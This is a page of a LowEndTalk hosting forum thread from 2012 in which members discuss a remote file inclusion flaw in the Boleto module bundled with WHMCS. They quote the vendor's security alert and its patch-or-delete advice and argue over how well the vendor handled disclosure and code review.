Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


New WHMCS Vulnerability - Page 2
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

New WHMCS Vulnerability

2»

Comments

  • KuJoeKuJoe Member, Host Rep

    @GetKVM_Ash said: Nothing in SPAM here (I use Google apps also). Judging by the look of it nobody got an email, it doesn't take this long to send out, i don't care how big there client base is.

    I got an e-mail from them prior to my post (I guess I am one of the lucky ones, I use Google Apps also).

  • @GetKVM_Ash said: Has anybody else got an email about this? Or are we expected to find it ourselves on WHT :S

    I got the email before coming here and seeing this.

  • Just got this in an email:

    WHMCS Security Alert

    www.whmcs.com

    We have become aware of a security issue that exists in the third party Boleto

    module included in WHMCS releases. This can potentially be used to exploit a
    WHMCS installation.

    If you do not use the Boleto module, then the quickest and easiest solution is

    to simply delete the /modules/gateways/boleto/ folder entirely after which you
    will not be at risk.

    Alternatively if you do use the module, you can download and apply the patch to

    your installation here: http://www.whmcs.com/members/dl.php?type=d&id=138

    This issue affects all WHMCS versions.

    If you have any questions or need any assistance, please do not hesitate to

    contact us. We apologize for the inconvenience.

    Kind Regards,

    The WHMCS Team
    www.whmcs.com

  • Just got the email a few hours ago

  • I received an email about an hour ago

  • Anyone actually seen the exploit yet? Another SQL injection?

  • jarjar Patron Provider, Top Host, Veteran

    @MartinD You make solid points. Honestly I don't mind this, there's going to be an exploit every now and then that people miss, it happens to the best of us. With cpanel taking an interest I'm not worried about whmcs. Cpanel isn't known for being without exploits either, but when you're on top it's impossible to employ a workforce that matches the man power of those with malicious intent against you that act collectively and individually.

    Thanked by 2KuJoe Maounique
  • KuJoeKuJoe Member, Host Rep

    @jarland Very nicely said.

  • PacketVMPacketVM Member, Host Rep

    I got an email to my personal email at 12.07AM (GMT) and to my business email at 2.40AM (GMT) so quite a difference.

  • Also received an email from WHMCS last night at 11:30 PM (UTC)

  • @apollo15 said: injection

    Even worse, a RFI according to this post

  • joepie91joepie91 Member, Patron Provider

    @jarland said: @MartinD You make solid points. Honestly I don't mind this, there's going to be an exploit every now and then that people miss, it happens to the best of us. With cpanel taking an interest I'm not worried about whmcs. Cpanel isn't known for being without exploits either, but when you're on top it's impossible to employ a workforce that matches the man power of those with malicious intent against you that act collectively and individually.

    This has very little to do with manpower.

    This is an RFI, for crying out loud. And a stupidly simple one at that - one that could have easily been prevented with proper developers and source review.

    This is the kind of vuln you find in the code of someone that just started writing PHP 2 months ago.

  • KuJoeKuJoe Member, Host Rep
    edited October 2012

    For what it's worth, the Boleto addon was written by Boleto (not WHMCS) and is not encoded. While WHMCS is at fault for not reviewing the code, the same fault can be placed on the admins putting the files on their system.

    Thanked by 1MartinD
  • honestly I'm not sure how all of these SQL injections pop up...when I write stuff I always make sure to escape it (or now that I'm using MySQL PEDO I always prepare it) - client input should NEVER be trusted....

    @KuJoe agreed, they should definitely be checking their stuff

  • OliverOliver Member, Host Rep

    The software has a bug, someone finds it, it is fixed. What's bad here? This is what we should expect from WHMCS IMO, it's not as if they ignored it. All software has bugs...

    @MartinD said: If they did send one, it takes a while to arrive given the size of their customer base :)

    How would you know anything about the size of their custo.. oh wait. Never mind... ;-)

  • @Spencer said: You can buy WHMCS fully decrypted

    Then you can rename and edit each file/directory in order to be more secure from attack :D

  • I think WHMCS is great.
    It works just fine, it has many options and nice API.
    In addition, they fixed the bug on time and they did sent an email to let their customers know about it.

    What we do after upgrading is just delete all modules we don't need.

    Thanked by 2KuJoe HostCheetah
  • Never heard about Boleto but seems somebody else did.

  • Typing "boleto" into google doesn't turn up a payment processor for me. Is this even in existence anymore?

  • AsadAsad Member
    edited October 2012

    @Damian said: Typing "boleto" into google doesn't turn up a payment processor for me. Is this even in existence anymore?

    Grabbed this from the module files:
    http://boletophp.com.br/

    Anyone know what the hell this thing is? I recognise a few banks such as HSBC and Santander.

  • Santander... The spanish with english branches? :L

  • letboxletbox Member, Patron Provider

    I received an email on my yahoo mail, that nice.

  • joepie91joepie91 Member, Patron Provider
    edited October 2012

    @Oliver said: The software has a bug, someone finds it, it is fixed. What's bad here? This is what we should expect from WHMCS IMO, it's not as if they ignored it. All software has bugs...

    1. This vulnerability was trivial and an entry-level developer mistake - it should not have existed and passed code review in the first place. "All software has bugs" is a nonsense argument in this case. Proper software has code reviews and security audits that pick out trivial RFI vulnerabilities like this if the developer is incompetent enough to create such a situation in the first place. Unpredictable and harmless bugs are a whole different story.
    2. Customers were not properly informed of the vulnerability. No, they weren't. If you encounter an issue like this, you make sure that the e-mail arrives straight-away for all customers. If that costs you a pretty penny because you have to sign up for SendGrid, that's your risk of doing business.
  • @Oliver said: How would you know anything about the size of their custo.. oh wait. Never mind... ;-)

    Not entirely sure what you're alluding to here however if it's the WHMCS DB leak, I'd like to see what evidence you have to suggest I know anything about the data contain therein.

  • OliverOliver Member, Host Rep

    joepie91, OK.

    MartinD, their customer base is huge.

    :-)

Sign In or Register to comment.